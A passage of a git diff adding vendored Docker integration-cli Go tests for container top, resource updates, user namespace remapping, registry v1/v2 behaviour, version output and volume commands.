*check.C) { + out, _ := runSleepingContainer(c, "-d") + cleanedContainerID := strings.TrimSpace(out) + + var expected icmd.Expected + switch daemonPlatform { + case "windows": + expected = icmd.Expected{ExitCode: 1, Err: "Windows does not support arguments to top"} + default: + expected = icmd.Expected{Out: "PID"} + } + result := dockerCmdWithResult("top", cleanedContainerID, "-o", "pid") + c.Assert(result, icmd.Matches, expected) +} + +func (s *DockerSuite) TestTopNonPrivileged(c *check.C) { + out, _ := runSleepingContainer(c, "-d") + cleanedContainerID := strings.TrimSpace(out) + + out1, _ := dockerCmd(c, "top", cleanedContainerID) + out2, _ := dockerCmd(c, "top", cleanedContainerID) + dockerCmd(c, "kill", cleanedContainerID) + + // Windows will list the name of the launched executable which in this case is busybox.exe, without the parameters. + // Linux will display the command executed in the container + var lookingFor string + if daemonPlatform == "windows" { + lookingFor = "busybox.exe" + } else { + lookingFor = "top" + } + + c.Assert(out1, checker.Contains, lookingFor, check.Commentf("top should've listed `%s` in the process list, but failed the first time", lookingFor)) + c.Assert(out2, checker.Contains, lookingFor, check.Commentf("top should've listed `%s` in the process list, but failed the second time", lookingFor)) +} + +// TestTopWindowsCoreProcesses validates that there are lines for the critical +// processes which are found in a Windows container. Note Windows is architecturally +// very different to Linux in this regard. +func (s *DockerSuite) TestTopWindowsCoreProcesses(c *check.C) { + testRequires(c, DaemonIsWindows) + out, _ := runSleepingContainer(c, "-d") + cleanedContainerID := strings.TrimSpace(out) + out1, _ := dockerCmd(c, "top", cleanedContainerID) + lookingFor := []string{"smss.exe", "csrss.exe", "wininit.exe", "services.exe", "lsass.exe", "CExecSvc.exe"} + for i, s := range lookingFor { + c.Assert(out1, checker.Contains, s, check.Commentf("top should've listed `%s` in the process list, but failed. Test case %d", s, i)) + } +} + +func (s *DockerSuite) TestTopPrivileged(c *check.C) { + // Windows does not support --privileged + testRequires(c, DaemonIsLinux, NotUserNamespace) + out, _ := dockerCmd(c, "run", "--privileged", "-i", "-d", "busybox", "top") + cleanedContainerID := strings.TrimSpace(out) + + out1, _ := dockerCmd(c, "top", cleanedContainerID) + out2, _ := dockerCmd(c, "top", cleanedContainerID) + dockerCmd(c, "kill", cleanedContainerID) + + c.Assert(out1, checker.Contains, "top", check.Commentf("top should've listed `top` in the process list, but failed the first time")) + c.Assert(out2, checker.Contains, "top", check.Commentf("top should've listed `top` in the process list, but failed the second time")) +} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_update_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_update_test.go new file mode 100644 index 0000000000..0b31bb45ff --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_update_test.go @@ -0,0 +1,41 @@ +package main + +import ( + "strings" + "time" + + "github.com/docker/docker/pkg/integration/checker" + "github.com/go-check/check" +) + +func (s *DockerSuite) TestUpdateRestartPolicy(c *check.C) { + out, _ := dockerCmd(c, "run", "-d", "--restart=on-failure:3", "busybox", "sh", "-c", "sleep 1 && false") + timeout := 60 * time.Second + if daemonPlatform == "windows" { + timeout = 180 * time.Second + } + + id := strings.TrimSpace(string(out)) + + // update restart policy to on-failure:5 + dockerCmd(c, "update", "--restart=on-failure:5", id) + + err := waitExited(id, timeout) + c.Assert(err, checker.IsNil) + + count := inspectField(c, id, "RestartCount") + c.Assert(count, checker.Equals, "5") + + maximumRetryCount := inspectField(c, id, "HostConfig.RestartPolicy.MaximumRetryCount") + c.Assert(maximumRetryCount, checker.Equals, "5") +} + +func (s *DockerSuite) TestUpdateRestartWithAutoRemoveFlag(c *check.C) { + out, _ := runSleepingContainer(c, "--rm") + id := strings.TrimSpace(out) + + // update restart policy for an AutoRemove container + out, _, err := dockerCmdWithError("update", "--restart=always", id) + c.Assert(err, checker.NotNil) + c.Assert(out, checker.Contains, "Restart policy cannot be updated because AutoRemove is enabled for the container") +} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_update_unix_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_update_unix_test.go new file mode 100644 index 0000000000..580ff02602 --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_update_unix_test.go @@ -0,0 +1,283 @@ +// +build !windows + +package main + +import ( + "encoding/json" + "fmt" + "github.com/kr/pty" + "os/exec" + "strings" + "time" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/pkg/integration/checker" + "github.com/docker/docker/pkg/parsers/kernel" + "github.com/go-check/check" +) + +func (s *DockerSuite) TestUpdateRunningContainer(c *check.C) { + testRequires(c, DaemonIsLinux) + testRequires(c, memoryLimitSupport) + + name := "test-update-container" + dockerCmd(c, "run", "-d", "--name", name, "-m", "300M", "busybox", "top") + dockerCmd(c, "update", "-m", "500M", name) + + c.Assert(inspectField(c, name, "HostConfig.Memory"), checker.Equals, "524288000") + + file := "/sys/fs/cgroup/memory/memory.limit_in_bytes" + out, _ := dockerCmd(c, "exec", name, "cat", file) + c.Assert(strings.TrimSpace(out), checker.Equals, "524288000") +} + +func (s *DockerSuite) TestUpdateRunningContainerWithRestart(c *check.C) { + testRequires(c, DaemonIsLinux) + testRequires(c, memoryLimitSupport) + + name := "test-update-container" + dockerCmd(c, "run", "-d", "--name", name, "-m", "300M", "busybox", "top") + dockerCmd(c, "update", "-m", "500M", name) + dockerCmd(c, "restart", name) + + c.Assert(inspectField(c, name, "HostConfig.Memory"), checker.Equals, "524288000") + + file := "/sys/fs/cgroup/memory/memory.limit_in_bytes" + out, _ := dockerCmd(c, "exec", name, "cat", file) + c.Assert(strings.TrimSpace(out), checker.Equals, "524288000") +} + +func (s *DockerSuite) TestUpdateStoppedContainer(c *check.C) { + testRequires(c, DaemonIsLinux) + testRequires(c, memoryLimitSupport) + + name := "test-update-container" + file := "/sys/fs/cgroup/memory/memory.limit_in_bytes" + dockerCmd(c, "run", "--name", name, "-m", "300M", "busybox", "cat", file) + dockerCmd(c, "update", "-m", "500M", name) + + c.Assert(inspectField(c, name, "HostConfig.Memory"), checker.Equals, "524288000") + + out, _ := dockerCmd(c, "start", "-a", name) + c.Assert(strings.TrimSpace(out), checker.Equals, "524288000") +} + +func (s *DockerSuite) TestUpdatePausedContainer(c *check.C) { + testRequires(c, DaemonIsLinux) + testRequires(c, cpuShare) + + name := "test-update-container" + dockerCmd(c, "run", "-d", "--name", name, "--cpu-shares", "1000", "busybox", "top") + dockerCmd(c, "pause", name) + dockerCmd(c, "update", "--cpu-shares", "500", name) + + c.Assert(inspectField(c, name, "HostConfig.CPUShares"), checker.Equals, "500") + + dockerCmd(c, "unpause", name) + file := "/sys/fs/cgroup/cpu/cpu.shares" + out, _ := dockerCmd(c, "exec", name, "cat", file) + c.Assert(strings.TrimSpace(out), checker.Equals, "500") +} + +func (s *DockerSuite) TestUpdateWithUntouchedFields(c *check.C) { + testRequires(c, DaemonIsLinux) + testRequires(c, memoryLimitSupport) + testRequires(c, cpuShare) + + name := "test-update-container" + dockerCmd(c, "run", "-d", "--name", name, "-m", "300M", "--cpu-shares", "800", "busybox", "top") + dockerCmd(c, "update", "-m", "500M", name) + + // Update memory and not touch cpus, `cpuset.cpus` should still have the old value + out := inspectField(c, name, "HostConfig.CPUShares") + c.Assert(out, check.Equals, "800") + + file := "/sys/fs/cgroup/cpu/cpu.shares" + out, _ = dockerCmd(c, "exec", name, "cat", file) + c.Assert(strings.TrimSpace(out), checker.Equals, "800") +} + +func (s *DockerSuite) TestUpdateContainerInvalidValue(c *check.C) { + testRequires(c, DaemonIsLinux) + testRequires(c, memoryLimitSupport) + + name := "test-update-container" + dockerCmd(c, "run", "-d", "--name", name, "-m", "300M", "busybox", "true") + out, _, err := dockerCmdWithError("update", "-m", "2M", name) + c.Assert(err, check.NotNil) + expected := "Minimum memory limit allowed is 4MB" + c.Assert(out, checker.Contains, expected) +} + +func (s *DockerSuite) TestUpdateContainerWithoutFlags(c *check.C) { + testRequires(c, DaemonIsLinux) + testRequires(c, memoryLimitSupport) + + name := "test-update-container" + dockerCmd(c, "run", "-d", "--name", name, "-m", "300M", "busybox", "true") + _, _, err := dockerCmdWithError("update", name) + c.Assert(err, check.NotNil) +} + +func (s *DockerSuite) TestUpdateKernelMemory(c *check.C) { + testRequires(c, DaemonIsLinux, kernelMemorySupport) + + name := "test-update-container" + dockerCmd(c, "run", "-d", "--name", name, "--kernel-memory", "50M", "busybox", "top") + dockerCmd(c, "update", "--kernel-memory", "100M", name) + + c.Assert(inspectField(c, name, "HostConfig.KernelMemory"), checker.Equals, "104857600") + + file := "/sys/fs/cgroup/memory/memory.kmem.limit_in_bytes" + out, _ := dockerCmd(c, "exec", name, "cat", file) + c.Assert(strings.TrimSpace(out), checker.Equals, "104857600") +} + +func (s *DockerSuite) TestUpdateKernelMemoryUninitialized(c *check.C) { + testRequires(c, DaemonIsLinux, kernelMemorySupport) + + isNewKernel := kernel.CheckKernelVersion(4, 6, 0) + name := "test-update-container" + dockerCmd(c, "run", "-d", "--name", name, "busybox", "top") + _, _, err := dockerCmdWithError("update", "--kernel-memory", "100M", name) + // Update kernel memory to a running container without kernel memory initialized + // is not allowed before kernel version 4.6. + if !isNewKernel { + c.Assert(err, check.NotNil) + } else { + c.Assert(err, check.IsNil) + } + + dockerCmd(c, "pause", name) + _, _, err = dockerCmdWithError("update", "--kernel-memory", "200M", name) + if !isNewKernel { + c.Assert(err, check.NotNil) + } else { + c.Assert(err, check.IsNil) + } + dockerCmd(c, "unpause", name) + + dockerCmd(c, "stop", name) + dockerCmd(c, "update", "--kernel-memory", "300M", name) + dockerCmd(c, "start", name) + + c.Assert(inspectField(c, name, "HostConfig.KernelMemory"), checker.Equals, "314572800") + + file := "/sys/fs/cgroup/memory/memory.kmem.limit_in_bytes" + out, _ := dockerCmd(c, "exec", name, "cat", file) + c.Assert(strings.TrimSpace(out), checker.Equals, "314572800") +} + +func (s *DockerSuite) TestUpdateSwapMemoryOnly(c *check.C) { + testRequires(c, DaemonIsLinux) + testRequires(c, memoryLimitSupport) + testRequires(c, swapMemorySupport) + + name := "test-update-container" + dockerCmd(c, "run", "-d", "--name", name, "--memory", "300M", "--memory-swap", "500M", "busybox", "top") + dockerCmd(c, "update", "--memory-swap", "600M", name) + + c.Assert(inspectField(c, name, "HostConfig.MemorySwap"), checker.Equals, "629145600") + + file := "/sys/fs/cgroup/memory/memory.memsw.limit_in_bytes" + out, _ := dockerCmd(c, "exec", name, "cat", file) + c.Assert(strings.TrimSpace(out), checker.Equals, "629145600") +} + +func (s *DockerSuite) TestUpdateInvalidSwapMemory(c *check.C) { + testRequires(c, DaemonIsLinux) + testRequires(c, memoryLimitSupport) + testRequires(c, swapMemorySupport) + + name := "test-update-container" + dockerCmd(c, "run", "-d", "--name", name, "--memory", "300M", "--memory-swap", "500M", "busybox", "top") + _, _, err := dockerCmdWithError("update", "--memory-swap", "200M", name) + // Update invalid swap memory should fail. + // This will pass docker config validation, but failed at kernel validation + c.Assert(err, check.NotNil) + + // Update invalid swap memory with failure should not change HostConfig + c.Assert(inspectField(c, name, "HostConfig.Memory"), checker.Equals, "314572800") + c.Assert(inspectField(c, name, "HostConfig.MemorySwap"), checker.Equals, "524288000") + + dockerCmd(c, "update", "--memory-swap", "600M", name) + + c.Assert(inspectField(c, name, "HostConfig.MemorySwap"), checker.Equals, "629145600") + + file := "/sys/fs/cgroup/memory/memory.memsw.limit_in_bytes" + out, _ := dockerCmd(c, "exec", name, "cat", file) + c.Assert(strings.TrimSpace(out), checker.Equals, "629145600") +} + +func (s *DockerSuite) TestUpdateStats(c *check.C) { + testRequires(c, DaemonIsLinux) + testRequires(c, memoryLimitSupport) + testRequires(c, cpuCfsQuota) + name := "foo" + dockerCmd(c, "run", "-d", "-ti", "--name", name, "-m", "500m", "busybox") + + c.Assert(waitRun(name), checker.IsNil) + + getMemLimit := func(id string) uint64 { + resp, body, err := sockRequestRaw("GET", fmt.Sprintf("/containers/%s/stats?stream=false", id), nil, "") + c.Assert(err, checker.IsNil) + c.Assert(resp.Header.Get("Content-Type"), checker.Equals, "application/json") + + var v *types.Stats + err = json.NewDecoder(body).Decode(&v) + c.Assert(err, checker.IsNil) + body.Close() + + return v.MemoryStats.Limit + } + preMemLimit := getMemLimit(name) + + dockerCmd(c, "update", "--cpu-quota", "2000", name) + + curMemLimit := getMemLimit(name) + + c.Assert(preMemLimit, checker.Equals, curMemLimit) + +} + +func (s *DockerSuite) TestUpdateMemoryWithSwapMemory(c *check.C) { + testRequires(c, DaemonIsLinux) + testRequires(c, memoryLimitSupport) + testRequires(c, swapMemorySupport) + + name := "test-update-container" + dockerCmd(c, "run", "-d", "--name", name, "--memory", "300M", "busybox", "top") + out, _, err := dockerCmdWithError("update", "--memory", "800M", name) + c.Assert(err, checker.NotNil) + c.Assert(out, checker.Contains, "Memory limit should be smaller than already set memoryswap limit") + + dockerCmd(c, "update", "--memory", "800M", "--memory-swap", "1000M", name) +} + +func (s *DockerSuite) TestUpdateNotAffectMonitorRestartPolicy(c *check.C) { + testRequires(c, DaemonIsLinux, cpuShare) + + out, _ := dockerCmd(c, "run", "-tid", "--restart=always", "busybox", "sh") + id := strings.TrimSpace(string(out)) + dockerCmd(c, "update", "--cpu-shares", "512", id) + + cpty, tty, err := pty.Open() + c.Assert(err, checker.IsNil) + defer cpty.Close() + + cmd := exec.Command(dockerBinary, "attach", id) + cmd.Stdin = tty + + c.Assert(cmd.Start(), checker.IsNil) + defer cmd.Process.Kill() + + _, err = cpty.Write([]byte("exit\n")) + c.Assert(err, checker.IsNil) + + c.Assert(cmd.Wait(), checker.IsNil) + + // container should restart again and keep running + err = waitInspect(id, "{{.RestartCount}}", "1", 30*time.Second) + c.Assert(err, checker.IsNil) + c.Assert(waitRun(id), checker.IsNil) +} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_userns_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_userns_test.go new file mode 100644 index 0000000000..acf74238b2 --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_userns_test.go @@ -0,0 +1,98 @@ +// +build !windows + +package main + +import ( + "fmt" + "io/ioutil" + "os" + "os/exec" + "path" + "path/filepath" + "strconv" + "strings" + + "github.com/docker/docker/pkg/integration/checker" + "github.com/docker/docker/pkg/stringid" + "github.com/docker/docker/pkg/system" + "github.com/go-check/check" +) + +// user namespaces test: run daemon with remapped root setting +// 1. validate uid/gid maps are set properly +// 2. verify that files created are owned by remapped root +func (s *DockerDaemonSuite) TestDaemonUserNamespaceRootSetting(c *check.C) { + testRequires(c, DaemonIsLinux, SameHostDaemon, UserNamespaceInKernel) + + c.Assert(s.d.StartWithBusybox("--userns-remap", "default"), checker.IsNil) + + tmpDir, err := ioutil.TempDir("", "userns") + c.Assert(err, checker.IsNil) + + defer os.RemoveAll(tmpDir) + + // Set a non-existent path + tmpDirNotExists := path.Join(os.TempDir(), "userns"+stringid.GenerateRandomID()) + defer os.RemoveAll(tmpDirNotExists) + + // we need to find the uid and gid of the remapped root from the daemon's root dir info + uidgid := strings.Split(filepath.Base(s.d.root), ".") + c.Assert(uidgid, checker.HasLen, 2, check.Commentf("Should have gotten uid/gid strings from root dirname: %s", filepath.Base(s.d.root))) + uid, err := strconv.Atoi(uidgid[0]) + c.Assert(err, checker.IsNil, check.Commentf("Can't parse uid")) + gid, err := strconv.Atoi(uidgid[1]) + c.Assert(err, checker.IsNil, check.Commentf("Can't parse gid")) + + // writable by the remapped root UID/GID pair + c.Assert(os.Chown(tmpDir, uid, gid), checker.IsNil) + + out, err := s.d.Cmd("run", "-d", "--name", "userns", "-v", tmpDir+":/goofy", "-v", tmpDirNotExists+":/donald", "busybox", "sh", "-c", "touch /goofy/testfile; top") + c.Assert(err, checker.IsNil, check.Commentf("Output: %s", out)) + user := s.findUser(c, "userns") + c.Assert(uidgid[0], checker.Equals, user) + + // check that the created directory is owned by remapped uid:gid + statNotExists, err := system.Stat(tmpDirNotExists) + c.Assert(err, checker.IsNil) + c.Assert(statNotExists.UID(), checker.Equals, uint32(uid), check.Commentf("Created directory not owned by remapped root UID")) + c.Assert(statNotExists.GID(), checker.Equals, uint32(gid), check.Commentf("Created directory not owned by remapped root GID")) + + pid, err := s.d.Cmd("inspect", "--format={{.State.Pid}}", "userns") + c.Assert(err, checker.IsNil, check.Commentf("Could not inspect running container: out: %q", pid)) + // check the uid and gid maps for the PID to ensure root is remapped + // (cmd = cat /proc//uid_map | grep -E '0\s+9999\s+1') + out, rc1, err := runCommandPipelineWithOutput( + exec.Command("cat", "/proc/"+strings.TrimSpace(pid)+"/uid_map"), + exec.Command("grep", "-E", fmt.Sprintf("0[[:space:]]+%d[[:space:]]+", uid))) + c.Assert(rc1, checker.Equals, 0, check.Commentf("Didn't match uid_map: output: %s", out)) + + out, rc2, err := runCommandPipelineWithOutput( + exec.Command("cat", "/proc/"+strings.TrimSpace(pid)+"/gid_map"), + exec.Command("grep", "-E", fmt.Sprintf("0[[:space:]]+%d[[:space:]]+", gid))) + c.Assert(rc2, checker.Equals, 0, check.Commentf("Didn't match gid_map: output: %s", out)) + + // check that the touched file is owned by remapped uid:gid + stat, err := system.Stat(filepath.Join(tmpDir, "testfile")) + c.Assert(err, checker.IsNil) + c.Assert(stat.UID(), checker.Equals, uint32(uid), check.Commentf("Touched file not owned by remapped root UID")) + c.Assert(stat.GID(), checker.Equals, uint32(gid), check.Commentf("Touched file not owned by remapped root GID")) + + // use host usernamespace + out, err = s.d.Cmd("run", "-d", "--name", "userns_skip", "--userns", "host", "busybox", "sh", "-c", "touch /goofy/testfile; top") + c.Assert(err, checker.IsNil, check.Commentf("Output: %s", out)) + user = s.findUser(c, "userns_skip") + // userns are skipped, user is root + c.Assert(user, checker.Equals, "root") +} + +// findUser finds the uid or name of the user of the first process that runs in a container +func (s *DockerDaemonSuite) findUser(c *check.C, container string) string { + out, err := s.d.Cmd("top", container) + c.Assert(err, checker.IsNil, check.Commentf("Output: %s", out)) + rows := strings.Split(out, "\n") + if len(rows) < 2 { + // No process rows founds + c.FailNow() + } + return strings.Fields(rows[1])[0] +} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_v2_only_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_v2_only_test.go new file mode 100644 index 0000000000..889936a062 --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_v2_only_test.go @@ -0,0 +1,125 @@ +package main + +import ( + "fmt" + "io/ioutil" + "net/http" + "os" + + "github.com/go-check/check" +) + +func makefile(contents string) (string, func(), error) { + cleanup := func() { + + } + + f, err := ioutil.TempFile(".", "tmp") + if err != nil { + return "", cleanup, err + } + err = ioutil.WriteFile(f.Name(), []byte(contents), os.ModePerm) + if err != nil { + return "", cleanup, err + } + + cleanup = func() { + err := os.Remove(f.Name()) + if err != nil { + fmt.Println("Error removing tmpfile") + } + } + return f.Name(), cleanup, nil + +} + +// TestV2Only ensures that a daemon in v2-only mode does not +// attempt to contact any v1 registry endpoints. +func (s *DockerRegistrySuite) TestV2Only(c *check.C) { + reg, err := newTestRegistry(c) + c.Assert(err, check.IsNil) + + reg.registerHandler("/v2/", func(w http.ResponseWriter, r *http.Request) { + w.WriteHeader(404) + }) + + reg.registerHandler("/v1/.*", func(w http.ResponseWriter, r *http.Request) { + c.Fatal("V1 registry contacted") + }) + + repoName := fmt.Sprintf("%s/busybox", reg.hostport) + + err = s.d.Start("--insecure-registry", reg.hostport, "--disable-legacy-registry=true") + c.Assert(err, check.IsNil) + + dockerfileName, cleanup, err := makefile(fmt.Sprintf("FROM %s/busybox", reg.hostport)) + c.Assert(err, check.IsNil, check.Commentf("Unable to create test dockerfile")) + defer cleanup() + + s.d.Cmd("build", "--file", dockerfileName, ".") + + s.d.Cmd("run", repoName) + s.d.Cmd("login", "-u", "richard", "-p", "testtest", "-e", "testuser@testdomain.com", reg.hostport) + s.d.Cmd("tag", "busybox", repoName) + s.d.Cmd("push", repoName) + s.d.Cmd("pull", repoName) +} + +// TestV1 starts a daemon in 'normal' mode +// and ensure v1 endpoints are hit for the following operations: +// login, push, pull, build & run +func (s *DockerRegistrySuite) TestV1(c *check.C) { + reg, err := newTestRegistry(c) + c.Assert(err, check.IsNil) + + v2Pings := 0 + reg.registerHandler("/v2/", func(w http.ResponseWriter, r *http.Request) { + v2Pings++ + // V2 ping 404 causes fallback to v1 + w.WriteHeader(404) + }) + + v1Pings := 0 + reg.registerHandler("/v1/_ping", func(w http.ResponseWriter, r *http.Request) { + v1Pings++ + }) + + v1Logins := 0 + reg.registerHandler("/v1/users/", func(w http.ResponseWriter, r *http.Request) { + v1Logins++ + }) + + v1Repo := 0 + reg.registerHandler("/v1/repositories/busybox/", func(w http.ResponseWriter, r *http.Request) { + v1Repo++ + }) + + reg.registerHandler("/v1/repositories/busybox/images", func(w http.ResponseWriter, r *http.Request) { + v1Repo++ + }) + + err = s.d.Start("--insecure-registry", reg.hostport, "--disable-legacy-registry=false") + c.Assert(err, check.IsNil) + + dockerfileName, cleanup, err := makefile(fmt.Sprintf("FROM %s/busybox", reg.hostport)) + c.Assert(err, check.IsNil, check.Commentf("Unable to create test dockerfile")) + defer cleanup() + + s.d.Cmd("build", "--file", dockerfileName, ".") + c.Assert(v1Repo, check.Equals, 1, check.Commentf("Expected v1 repository access after build")) + + repoName := fmt.Sprintf("%s/busybox", reg.hostport) + s.d.Cmd("run", repoName) + c.Assert(v1Repo, check.Equals, 2, check.Commentf("Expected v1 repository access after run")) + + s.d.Cmd("login", "-u", "richard", "-p", "testtest", reg.hostport) + c.Assert(v1Logins, check.Equals, 1, check.Commentf("Expected v1 login attempt")) + + s.d.Cmd("tag", "busybox", repoName) + s.d.Cmd("push", repoName) + + c.Assert(v1Repo, check.Equals, 2) + + s.d.Cmd("pull", repoName) + c.Assert(v1Repo, check.Equals, 3, check.Commentf("Expected v1 repository access after pull")) +} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_version_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_version_test.go new file mode 100644 index 0000000000..7672beb732 --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_version_test.go @@ -0,0 +1,58 @@ +package main + +import ( + "strings" + + "github.com/docker/docker/pkg/integration/checker" + "github.com/go-check/check" +) + +// ensure docker version works +func (s *DockerSuite) TestVersionEnsureSucceeds(c *check.C) { + out, _ := dockerCmd(c, "version") + stringsToCheck := map[string]int{ + "Client:": 1, + "Server:": 1, + " Version:": 2, + " API version:": 2, + " Go version:": 2, + " Git commit:": 2, + " OS/Arch:": 2, + " Built:": 2, + } + + for k, v := range stringsToCheck { + c.Assert(strings.Count(out, k), checker.Equals, v, check.Commentf("The count of %v in %s does not match excepted", k, out)) + } +} + +// ensure the Windows daemon return the correct platform string +func (s *DockerSuite) TestVersionPlatform_w(c *check.C) { + testRequires(c, DaemonIsWindows) + testVersionPlatform(c, "windows/amd64") +} + +// ensure the Linux daemon return the correct platform string +func (s *DockerSuite) TestVersionPlatform_l(c *check.C) { + testRequires(c, DaemonIsLinux) + testVersionPlatform(c, "linux") +} + +func testVersionPlatform(c *check.C, platform string) { + out, _ := dockerCmd(c, "version") + expected := "OS/Arch: " + platform + + split := strings.Split(out, "\n") + c.Assert(len(split) >= 14, checker.Equals, true, check.Commentf("got %d lines from version", len(split))) + + // Verify the second 'OS/Arch' matches the platform. Experimental has + // more lines of output than 'regular' + bFound := false + for i := 14; i < len(split); i++ { + if strings.Contains(split[i], expected) { + bFound = true + break + } + } + c.Assert(bFound, checker.Equals, true, check.Commentf("Could not find server '%s' in '%s'", expected, out)) +} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_volume_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_volume_test.go new file mode 100644 index 0000000000..61a9413758 --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_volume_test.go @@ -0,0 +1,427 @@ +package main + +import ( + "fmt" + "io/ioutil" + "os" + "os/exec" + "path/filepath" + "strings" + + "github.com/docker/docker/pkg/integration/checker" + icmd "github.com/docker/docker/pkg/integration/cmd" + "github.com/go-check/check" +) + +func (s *DockerSuite) TestVolumeCLICreate(c *check.C) { + dockerCmd(c, "volume", "create") + + _, err := runCommand(exec.Command(dockerBinary, "volume", "create", "-d", "nosuchdriver")) + c.Assert(err, check.Not(check.IsNil)) + + // test using hidden --name option + out, _ := dockerCmd(c, "volume", "create", "--name=test") + name := strings.TrimSpace(out) + c.Assert(name, check.Equals, "test") + + out, _ = dockerCmd(c, "volume", "create", "test2") + name = strings.TrimSpace(out) + c.Assert(name, check.Equals, "test2") +} + +func (s *DockerSuite) TestVolumeCLIInspect(c *check.C) { + c.Assert( + exec.Command(dockerBinary, "volume", "inspect", "doesntexist").Run(), + check.Not(check.IsNil), + check.Commentf("volume inspect should error on non-existent volume"), + ) + + out, _ := dockerCmd(c, "volume", "create") + name := strings.TrimSpace(out) + out, _ = dockerCmd(c, "volume", "inspect", "--format={{ .Name }}", name) + c.Assert(strings.TrimSpace(out), check.Equals, name) + + dockerCmd(c, "volume", "create", "test") + out, _ = dockerCmd(c, "volume", "inspect", "--format={{ .Name }}", "test") + c.Assert(strings.TrimSpace(out), check.Equals, "test") +} + +func (s *DockerSuite) TestVolumeCLIInspectMulti(c *check.C) { + dockerCmd(c, "volume", "create", "test1") + dockerCmd(c, "volume", "create", "test2") + dockerCmd(c, "volume", "create", "not-shown") + + result := dockerCmdWithResult("volume", "inspect", "--format={{ .Name }}", "test1", "test2", "doesntexist", "not-shown") + c.Assert(result, icmd.Matches, icmd.Expected{ + ExitCode: 1, + Err: "No such volume: doesntexist", + }) + + out := result.Stdout() + outArr := strings.Split(strings.TrimSpace(out), "\n") + c.Assert(len(outArr), check.Equals, 2, check.Commentf("\n%s", out)) + + c.Assert(out, checker.Contains, "test1") + c.Assert(out, checker.Contains, "test2") + c.Assert(out, checker.Not(checker.Contains), "not-shown") +} + +func (s *DockerSuite) TestVolumeCLILs(c *check.C) { + prefix, _ := getPrefixAndSlashFromDaemonPlatform() + dockerCmd(c, "volume", "create", "aaa") + + dockerCmd(c, "volume", "create", "test") + + dockerCmd(c, "volume", "create", "soo") + dockerCmd(c, "run", "-v", "soo:"+prefix+"/foo", "busybox", "ls", "/") + + out, _ := dockerCmd(c, "volume", "ls") + outArr := strings.Split(strings.TrimSpace(out), "\n") + c.Assert(len(outArr), check.Equals, 4, check.Commentf("\n%s", out)) + + assertVolList(c, out, []string{"aaa", "soo", "test"}) +} + +func (s *DockerSuite) TestVolumeLsFormat(c *check.C) { + dockerCmd(c, "volume", "create", "aaa") + dockerCmd(c, "volume", "create", "test") + dockerCmd(c, "volume", "create", "soo") + + out, _ := dockerCmd(c, "volume", "ls", "--format", "{{.Name}}") + lines := strings.Split(strings.TrimSpace(string(out)), "\n") + + expected := []string{"aaa", "soo", "test"} + var names []string + names = append(names, lines...) + c.Assert(expected, checker.DeepEquals, names, check.Commentf("Expected array with truncated names: %v, got: %v", expected, names)) +} + +func (s *DockerSuite) TestVolumeLsFormatDefaultFormat(c *check.C) { + dockerCmd(c, "volume", "create", "aaa") + dockerCmd(c, "volume", "create", "test") + dockerCmd(c, "volume", "create", "soo") + + config := `{ + "volumesFormat": "{{ .Name }} default" +}` + d, err := ioutil.TempDir("", "integration-cli-") + c.Assert(err, checker.IsNil) + defer os.RemoveAll(d) + + err = ioutil.WriteFile(filepath.Join(d, "config.json"), []byte(config), 0644) + c.Assert(err, checker.IsNil) + + out, _ := dockerCmd(c, "--config", d, "volume", "ls") + lines := strings.Split(strings.TrimSpace(string(out)), "\n") + + expected := []string{"aaa default", "soo default", "test default"} + var names []string + names = append(names, lines...) + c.Assert(expected, checker.DeepEquals, names, check.Commentf("Expected array with truncated names: %v, got: %v", expected, names)) +} + +// assertVolList checks volume retrieved with ls command +// equals to expected volume list +// note: out should be `volume ls [option]` result +func assertVolList(c *check.C, out string, expectVols []string) { + lines := strings.Split(out, "\n") + var volList []string + for _, line := range lines[1 : len(lines)-1] { + volFields := strings.Fields(line) + // wrap all volume name in volList + volList = append(volList, volFields[1]) + } + + // volume ls should contains all expected volumes + c.Assert(volList, checker.DeepEquals, expectVols) +} + +func (s *DockerSuite) TestVolumeCLILsFilterDangling(c *check.C) { + prefix, _ := getPrefixAndSlashFromDaemonPlatform() + dockerCmd(c, "volume", "create", "testnotinuse1") + dockerCmd(c, "volume", "create", "testisinuse1") + dockerCmd(c, "volume", "create", "testisinuse2") + + // Make sure both "created" (but not started), and started + // containers are included in reference counting + dockerCmd(c, "run", "--name", "volume-test1", "-v", "testisinuse1:"+prefix+"/foo", "busybox", "true") + dockerCmd(c, "create", "--name", "volume-test2", "-v", "testisinuse2:"+prefix+"/foo", "busybox", "true") + + out, _ := dockerCmd(c, "volume", "ls") + + // No filter, all volumes should show + c.Assert(out, checker.Contains, "testnotinuse1\n", check.Commentf("expected volume 'testnotinuse1' in output")) + c.Assert(out, checker.Contains, "testisinuse1\n", check.Commentf("expected volume 'testisinuse1' in output")) + c.Assert(out, checker.Contains, "testisinuse2\n", check.Commentf("expected volume 'testisinuse2' in output")) + + out, _ = dockerCmd(c, "volume", "ls", "--filter", "dangling=false") + + // Explicitly disabling dangling + c.Assert(out, check.Not(checker.Contains), "testnotinuse1\n", check.Commentf("expected volume 'testnotinuse1' in output")) + c.Assert(out, checker.Contains, "testisinuse1\n", check.Commentf("expected volume 'testisinuse1' in output")) + c.Assert(out, checker.Contains, "testisinuse2\n", check.Commentf("expected volume 'testisinuse2' in output")) + + out, _ = dockerCmd(c, "volume", "ls", "--filter", "dangling=true") + + // Filter "dangling" volumes; only "dangling" (unused) volumes should be in the output + c.Assert(out, checker.Contains, "testnotinuse1\n", check.Commentf("expected volume 'testnotinuse1' in output")) + 